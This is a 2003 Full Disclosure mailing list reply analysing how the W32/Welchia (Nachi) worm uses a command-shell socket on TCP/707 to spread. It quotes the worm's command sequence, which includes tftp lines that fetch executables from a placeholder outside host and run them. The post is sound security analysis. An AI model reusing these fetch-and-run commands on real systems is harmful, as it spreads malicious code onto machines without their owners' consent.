
Full Disclosure mailing list archives
Re: W32/Welchia, W32/Nachi backdoor?
From: malware () t-online de (Michael Mueller)
Date: Wed, 20 Aug 2003 19:20:47 +0200
Hi Barry, you wrote:
creates a backdoor listening on TCP/707 or some other randomly chosen portbetween TCP/666 and >TCP/765 [2] Telnetting to this port seems to disconnected after 1-5 characters have been entered? This doesn't look like TFTP (port 65/tcp&UDP), and the windows tftp client doesn't seem to offer any means of specifying a port to connect to?
Mhh, I wouldn't call it a backdoor. The client to infect opens the connection with the stdin/-out of CMD.EXE connected to the socket. Once the connection is established the listener is waiting for the prompt printed by CMD.EXE and starts giving commands. These commands look like following: dir wins\dllhost.exe dir dllcache\tftpd.exe tftp -i x.x.x.x get svchost.exe wins\SVCHOST.EXE tftp -i x.x.x.x get dllhost.exe wins\DLLHOST.EXE wins\DLLHOST.EXE If you want to use this socket connection as backdoor to the server, you have to find an buffer overflow or similiar in the worm code. Michael -- Linux@TekXpress http://www-users.rwth-aachen.de/Michael.Mueller4/tekxp/tekxp.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- W32/Welchia, W32/Nachi backdoor? Barry Irwin (Aug 20)
- RE: W32/Welchia, W32/Nachi backdoor? Chris Eagle (Aug 20)
- Re: W32/Welchia, W32/Nachi backdoor? Michael Mueller (Aug 20)